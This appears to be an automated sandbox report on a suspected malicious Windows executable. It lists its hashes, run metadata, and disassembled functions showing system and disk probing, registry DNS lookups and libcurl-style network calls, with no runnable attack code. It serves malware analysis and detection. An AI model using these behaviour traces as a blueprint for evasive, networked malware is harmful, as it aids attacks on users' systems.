                                                Data Ascii: { "origin": "8.46.123.189"}



                                                Target ID: 1
                                                Start time: 11:15:22
                                                Start date: 23/12/2024
                                                Path: C:\Users\user\Desktop\B43WRnzSPD.exe
                                                Wow64 process (32bit): true
                                                Commandline: "C:\Users\user\Desktop\B43WRnzSPD.exe"
                                                Imagebase: 0x600000
                                                File size: 4'441'600 bytes
                                                MD5 hash: 76E5A31451EEFE694A963AE5B65ECFF2
                                                Has elevated privileges: true
                                                Has administrator privileges: true
                                                Programmed in: C, C++ or other language
                                                Reputation: low
                                                Has exited: true


                                                  Execution Graph

                                                  Execution Coverage: 2.3%
                                                  Dynamic/Decrypted Code Coverage: 0%
                                                  Signature Coverage: 21.9%
                                                  Total number of Nodes: 215
                                                  Total number of Limit Nodes: 31
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                  • API String ID: 0-1590685507
                                                  • Opcode ID: b0518293be6a40afe3153eac0d103a7d690bf141e9caf9d1ed711427f2ae3257
                                                  • Instruction ID: 8961b6aad25be0217ecb9d9d8e96cf24fb747bec01d4fce71c968ba93a2132c1
                                                  • Opcode Fuzzy Hash: b0518293be6a40afe3153eac0d103a7d690bf141e9caf9d1ed711427f2ae3257
                                                  • Instruction Fuzzy Hash: 16C29E31A043449FE724CF28C485BAAB7E2BF84714F05866DEC999B362D771E985CBC1

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSystemInfo.KERNELBASE ref: 00602579
                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 006025CC
                                                  • GetDriveTypeA.KERNELBASE ref: 00602647
                                                  • GetDiskFreeSpaceExA.KERNELBASE ref: 0060267E
                                                  • KiUserCallbackDispatcher.NTDLL ref: 006027E2
                                                  • FindFirstFileW.KERNELBASE ref: 006028F8
                                                  • FindNextFileW.KERNELBASE ref: 0060291F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                  • String ID: ;%`$@$`
                                                  • API String ID: 3271271169-619377937
                                                  • Opcode ID: 32edef2b340a2ac69f1c7bfd97bb2f5cf1c38e813313ce1bc3c4a528a4d1fa66
                                                  • Instruction ID: 5441468d2004bd1376987c5a0ec613c102b02b3578396c79b4294996a037f9bb
                                                  • Opcode Fuzzy Hash: 32edef2b340a2ac69f1c7bfd97bb2f5cf1c38e813313ce1bc3c4a528a4d1fa66
                                                  • Instruction Fuzzy Hash: 1DD1A1B5904709DFCB10EF68D585A9EBBF0AF48314F0089ADE898D7354E7349A84CF92

                                                  Control-flow Graph

                                                  • API calls named in the graph: FindFirstFileA, RegOpenKeyExA, CharUpperA, QueryFullProcessImageNameA, CloseHandle
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                  • String ID: 0
                                                  • API String ID: 2406880114-4108050209
                                                  • Opcode ID: 574b503cfc0174cc734a903f6046464379bf6591e08fa858c19505db7b9f15b8
                                                  • Instruction ID: f8f53f56d37c77128f1887e179fe294b0aa1d9fadb11a29a6aafe3eed681a374
                                                  • Opcode Fuzzy Hash: 574b503cfc0174cc734a903f6046464379bf6591e08fa858c19505db7b9f15b8
                                                  • Instruction Fuzzy Hash: 99E1E4B49043059FCB10EF68D988B9EBBF5AF84304F5088ADE888DB354E7749985CF52

                                                  APIs
                                                  • WSAEventSelect.WS2_32(?,?,?), ref: 00610711
                                                  • WSAEventSelect.WS2_32(?,?,00000000), ref: 006109DD
                                                  • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 006109FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: EventSelect$EnumEventsNetwork
                                                  • String ID: N=`$multi.c
                                                  • API String ID: 2170980988-3259019828
                                                  • Opcode ID: eb0981f58f63a319936c0b22e04c1e5b803c2c14a044c384fb90a36277516ce8
                                                  • Instruction ID: cfc5bedb7fc9f6317a4ccf905e09e784270b8486ffbbf658a0a4f99bf53389c2
                                                  • Opcode Fuzzy Hash: eb0981f58f63a319936c0b22e04c1e5b803c2c14a044c384fb90a36277516ce8
                                                  • Instruction Fuzzy Hash: B6D19E756083059BFB11CF24C881BEBB7E6BF94344F08482DF88586292E7B5E9D5CB52

                                                  APIs
                                                  • getsockname.WS2_32(-00000020,-00000020,?), ref: 006CB2B6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: getsockname
                                                  • String ID: ares__sortaddrinfo.c$cur != NULL
                                                  • API String ID: 3358416759-2430778319
                                                  • Opcode ID: ddea6a7621d556c157f0924ac6f7c228c4014f277ac70ef35792f8bd093aaae2
                                                  • Instruction ID: b4273676b32650fde1e5f356b6d9b9e8c584882aec4287f1ecc069ab271dfbfe
                                                  • Opcode Fuzzy Hash: ddea6a7621d556c157f0924ac6f7c228c4014f277ac70ef35792f8bd093aaae2
                                                  • Instruction Fuzzy Hash: F9C16D716042059FD718DF24C882F7AB7E6EF88304F44986DE8899B3A2DB35ED45CB81
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0b85d092316a127a69d53abe598db28c864f6bee7a8392c6d195a2fb3c1e0f30
                                                  • Instruction ID: ebf34562a2e88d19c0f93896e108b386ffbc201266323fe10f7a5db733aeee2e
                                                  • Opcode Fuzzy Hash: 0b85d092316a127a69d53abe598db28c864f6bee7a8392c6d195a2fb3c1e0f30
                                                  • Instruction Fuzzy Hash: 0791F33060C3495BD7358A69C8907FBB2F6EFC4324F2C8B2CE8A9432D4E7759D819691
                                                  APIs
                                                  • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,006B712E,?,?,?,00001001,00000000), ref: 006CA90D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: recvfrom
                                                  • String ID:
                                                  • API String ID: 846543921-0
                                                  • Opcode ID: 232ad5b5d2d26db02566ef424167b5c1e9f3067ba9034c2985cc17cfd76d13ac
                                                  • Instruction ID: 350c3c10ddd82a16f3a3f69c62d76726fb8a876d4b9c651a4baee00cdca640fa
                                                  • Opcode Fuzzy Hash: 232ad5b5d2d26db02566ef424167b5c1e9f3067ba9034c2985cc17cfd76d13ac
                                                  • Instruction Fuzzy Hash: B5F04975118348AFD2109A41DC84EBBBBEDEBC9768F05455DF948132118270AE118AB2
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 006BAA19
                                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 006BAA4C
                                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 006BAA97
                                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 006BAAE9
                                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 006BAB30
                                                  • RegCloseKey.KERNELBASE(?), ref: 006BAB6A
                                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 006BAB82
                                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 006BAC46
                                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 006BAD0A
                                                  • RegEnumKeyExA.KERNELBASE ref: 006BAD8D
                                                  • RegCloseKey.KERNELBASE(?), ref: 006BADD9
                                                  • RegEnumKeyExA.KERNELBASE ref: 006BAE08
                                                  • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 006BAE2A
                                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 006BAE54
                                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 006BAF63
                                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 006BAFB2
                                                  • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 006BB072
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: QueryValue$Open$CloseEnum
                                                  • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                  • API String ID: 4217438148-1047472027
                                                  • Opcode ID: aa09129c070776f6026543a7b39dc3f104749600116fc45ddb31b943f1b08955
                                                  • Instruction ID: 54388cc9344425fa13f5d64200b7b6c31fc8c5e84f09aee509fbcfec7820d31b
                                                  • Opcode Fuzzy Hash: aa09129c070776f6026543a7b39dc3f104749600116fc45ddb31b943f1b08955
                                                  • Instruction Fuzzy Hash: F9726CB1604301AFE7209B64CC81FAB77E9EF85700F145828F9859B3A1E775E985CB63
                                                  APIs
                                                  • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0063A831
                                                  Strings
                                                  • cf_socket_open() -> %d, fd=%d, xrefs: 0063A796
                                                  • Local port: %hu, xrefs: 0063AF28
                                                  • bind failed with errno %d: %s, xrefs: 0063B080
                                                  • @, xrefs: 0063A8F4
                                                  • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0063A6CE
                                                  • @, xrefs: 0063AC42
                                                  • Trying [%s]:%d..., xrefs: 0063A689
                                                  • Name '%s' family %i resolved to '%s' family %i, xrefs: 0063ADAC
                                                  • cf-socket.c, xrefs: 0063A5CD, 0063A735
                                                  • Could not set TCP_NODELAY: %s, xrefs: 0063A871
                                                  • Bind to local port %d failed, trying next, xrefs: 0063AFE5
                                                  • Trying %s:%d..., xrefs: 0063A7C2, 0063A7DE
                                                  • Couldn't bind to '%s' with errno %d: %s, xrefs: 0063AE1F
                                                  • Local Interface %s is ip %s using address family %i, xrefs: 0063AE60
                                                  • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0063AD0A
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: setsockopt
                                                  • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                  • API String ID: 3981526788-2373386790
                                                  • Opcode ID: de6bd4238117d926afb9c55b75fb61170c8052ef5ac1e7b0670c999a02d2ebbd
                                                  • Instruction ID: d50a611e6d9a111dffad80280ae26c3dbbca3b2fdf5d04e62e8953862c5ed012
                                                  • Opcode Fuzzy Hash: de6bd4238117d926afb9c55b75fb61170c8052ef5ac1e7b0670c999a02d2ebbd
                                                  • Instruction Fuzzy Hash: 1562F071508340ABE7218F64C882BEBB7E6AF95304F04492DF98897392E771E845DBD3

                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 006C9946
                                                  • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 006C9974
                                                  • RegCloseKey.KERNELBASE(?), ref: 006C998B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                                  • API String ID: 3677997916-615551945
                                                  • Opcode ID: e420a0db2900f3ecb1c2ce562059857324e04336b13ff1a673d7dfe191a33f59
                                                  • Instruction ID: 61fb7175c20372ddc0fe728fc3e172ea1131dc73bcd8482175559045be5d6e28
                                                  • Opcode Fuzzy Hash: e420a0db2900f3ecb1c2ce562059857324e04336b13ff1a673d7dfe191a33f59
                                                  • Instruction Fuzzy Hash: 5A32A7F5904201ABEB51AB20EC46FBB7696EF54314F08443CF80A96352FB32E955C7A7

                                                  APIs
                                                  • connect.WS2_32(?,?,00000001), ref: 00638C2F
                                                  • SleepEx.KERNELBASE(00000000,00000000), ref: 00638CF3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: Sleepconnect
                                                  • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                  • API String ID: 238548546-879669977
                                                  • Opcode ID: b393b17efe70c61a9448854d222c24984615859d1ca3c78c84899a76b0849c85
                                                  • Instruction ID: 8a2f6d8af78e6e2e62fe875c20d860d4beddbb0d3a37444d47fa18bf541a8092
                                                  • Opcode Fuzzy Hash: b393b17efe70c61a9448854d222c24984615859d1ca3c78c84899a76b0849c85
                                                  • Instruction Fuzzy Hash: B2B19D70604306AFDB10CF24C985BE6B7E2AF55314F08856DF85A8B3D2DB71E859C7A1

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: EnumOpen
                                                  • String ID: d
                                                  • API String ID: 3231578192-2564639436
                                                  • Opcode ID: 4309fb31d2f0fbd0aa939075ce9635c6dd8aaea89e5e04905167b25a15e6b0c0
                                                  • Instruction ID: 23e8d20f3694a11fbaf0d189cefcc2ab9118fb591ae7a6f8d62fd02705cec10a
                                                  • Opcode Fuzzy Hash: 4309fb31d2f0fbd0aa939075ce9635c6dd8aaea89e5e04905167b25a15e6b0c0
                                                  • Instruction Fuzzy Hash: E771B6B4904319DFDB10EF68D584B9EBBF0BF85308F1088ADE49897351D7749A898F92

                                                  APIs
                                                  • send.WS2_32(multi.c,?,?,?,N=`,00000000,?,?,006107BF), ref: 006076EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: send
                                                  • String ID: LIMIT %s:%d %s reached memlimit$N=`$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                  • API String ID: 2809346765-3352743802
                                                  • Opcode ID: 9e0368b3815b6016ac4243d65471ba1d05d1145ef2b2379eb613fa42cd0cfbc3
                                                  • Instruction ID: 395ae98a0f40513ea208321a158552b1747aecb37a08ce5da88b84a1a4fb6790
                                                  • Opcode Fuzzy Hash: 9e0368b3815b6016ac4243d65471ba1d05d1145ef2b2379eb613fa42cd0cfbc3
                                                  • Instruction Fuzzy Hash: 66113DB5E49344BBD1209B15AC46E273B9DDBD2B78F04094DF804633D1D561FD0182B1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1611 639290-6392ed call 6076a0 1614 6393c3-6393ce 1611->1614 1615 6392f3-6392fb 1611->1615 1622 6393d0-6393e1 1614->1622 1623 6393e5-639427 call 61d090 call 644f40 1614->1623 1616 639301-639333 call 61d8c0 call 61d9a0 1615->1616 1617 6393aa-6393af 1615->1617 1635 6393a7 1616->1635 1636 639335-639364 WSAIoctl 1616->1636 1620 639456-639470 1617->1620 1621 6393b5-6393bc 1617->1621 1625 639429-639431 1621->1625 1626 6393be 1621->1626 1622->1621 1627 6393e3 1622->1627 1623->1620 1623->1625 1630 639433-639437 1625->1630 1631 639439-63943f 1625->1631 1626->1620 1627->1620 1630->1620 1630->1631 1631->1620 1634 639441-639453 call 6450a0 1631->1634 1634->1620 1635->1617 1639 639366-63936f 1636->1639 1640 63939b-6393a4 1636->1640 1639->1640 1643 639371-639390 setsockopt 1639->1643 1640->1635 1643->1640 1644 639392-639395 1643->1644 1644->1640
                                                  APIs
                                                  • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0063935D
                                                  • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00639389
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: Ioctlsetsockopt
                                                  • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                  • API String ID: 1903391676-2691795271
                                                  • Opcode ID: 4b1202e06824e6f4e3d8b6c1b403591b4fcef73c937735bf7b382183f2ffbaae
                                                  • Instruction ID: aa995ce547dbd251e567adb28e10def82fb0d2fa695d7de398f59740de6f99e5
                                                  • Opcode Fuzzy Hash: 4b1202e06824e6f4e3d8b6c1b403591b4fcef73c937735bf7b382183f2ffbaae
                                                  • Instruction Fuzzy Hash: 1251D370A00305ABE710DF24C881FAAB7A6FF85314F148529FD488B392E771E991CBA1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1645 607770-60778e 1646 607790-607797 1645->1646 1647 6077b6-6077c2 recv 1645->1647 1646->1647 1648 607799-6077a1 1646->1648 1649 6077c4-6077d9 call 6072a0 1647->1649 1650 60782e-607832 1647->1650 1651 6077a3-6077b4 1648->1651 1652 6077db-607829 call 6072a0 call 60cb20 call 988c50 1648->1652 1649->1650 1651->1649 1652->1650
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: recv
                                                  • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                  • API String ID: 1507349165-640788491
                                                  • Opcode ID: 70011795f81a223db8b7ac89be665d61abf8c746baaa5ec00df88d6aa9955aed
                                                  • Instruction ID: 34bc61d26e73eca6c0b3c253f770310f4d66b5007ffa99ce311d5cbb4c23b621
                                                  • Opcode Fuzzy Hash: 70011795f81a223db8b7ac89be665d61abf8c746baaa5ec00df88d6aa9955aed
                                                  • Instruction Fuzzy Hash: 88112CB5E493447BD120AB659C4AF273B9DEBD2B68F09055CFC04633D1D671EC1186B2

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1664 6075e0-6075ed 1665 607607-607629 socket 1664->1665 1666 6075ef-6075f6 1664->1666 1668 60762b-60763c call 6072a0 1665->1668 1669 60763f-607642 1665->1669 1666->1665 1667 6075f8-6075ff 1666->1667 1670 607601-607602 1667->1670 1671 607643-607699 call 6072a0 call 60cb20 call 988c50 1667->1671 1668->1669 1670->1665
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: socket
                                                  • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                  • API String ID: 98920635-842387772
                                                  • Opcode ID: 41dbd60bab4c83a67e0191a64a37cbd1020a6d7d614ae7e26f190e31921b0227
                                                  • Instruction ID: c9f3b86533a45b213a1b27eb2a9584e441df3cef5abf8623663925179490dfcc
                                                  • Opcode Fuzzy Hash: 41dbd60bab4c83a67e0191a64a37cbd1020a6d7d614ae7e26f190e31921b0227
                                                  • Instruction Fuzzy Hash: D9114876E5035177D6206B696C1BF8B3B99EFD2734F080559F814A33E2D222E8A0C2E1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1773 63a150-63a159 1774 63a250 1773->1774 1775 63a15f-63a17b 1773->1775 1776 63a181-63a1ce getsockname 1775->1776 1777 63a249-63a24f 1775->1777 1778 63a1d0-63a1f5 call 61d090 1776->1778 1779 63a1f7-63a214 call 63ef30 1776->1779 1777->1774 1787 63a240-63a246 call 644f40 1778->1787 1779->1777 1783 63a216-63a23b call 61d090 1779->1783 1783->1787 1787->1777
                                                  APIs
                                                  • getsockname.WS2_32(?,?,00000080), ref: 0063A1C6
                                                  Strings
                                                  • getsockname() failed with errno %d: %s, xrefs: 0063A1F0
                                                  • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0063A23B
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: getsockname
                                                  • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                  • API String ID: 3358416759-2605427207
                                                  • Opcode ID: 5b0d560ba2c669b6bdd35efcde55c98eb274211dda910807c059b414ab695dfe
                                                  • Instruction ID: c374222e96be97241a9ddf0fa8af5550013a265773553e7fec45ee8c1cf4d0ad
                                                  • Opcode Fuzzy Hash: 5b0d560ba2c669b6bdd35efcde55c98eb274211dda910807c059b414ab695dfe
                                                  • Instruction Fuzzy Hash: 22210A31808680AAF7259B58DC42FE7B3BCEF91324F040618F99853151FB32598687E3

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1793 61d5e0-61d5ee 1794 61d5f0-61d604 call 61d690 1793->1794 1795 61d652-61d662 WSAStartup 1793->1795 1801 61d606-61d614 1794->1801 1802 61d61b-61d651 call 627620 1794->1802 1796 61d670-61d676 1795->1796 1797 61d664-61d66f 1795->1797 1796->1794 1799 61d67c-61d68d 1796->1799 1801->1802 1807 61d616 1801->1807 1807->1802
                                                  APIs
                                                  • WSAStartup.WS2_32(00000202), ref: 0061D65B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: Startup
                                                  • String ID: if_nametoindex$iphlpapi.dll
                                                  • API String ID: 724789610-3097795196
                                                  • Opcode ID: 9e89adbb3af0aaa89c4dcec2695f532f3542f7ae8cd5e042e8e5d2f10d7dec99
                                                  • Instruction ID: 7d2e6785b6ef4bc6d84dd50ed4e976d911851450bbf8840a49ee894a19711a8b
                                                  • Opcode Fuzzy Hash: 9e89adbb3af0aaa89c4dcec2695f532f3542f7ae8cd5e042e8e5d2f10d7dec99
                                                  • Instruction Fuzzy Hash: 2F0126D0A403C117F721AB38AE177E636D19B71304F481969A848C63E3FA39C4CAC2A2

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
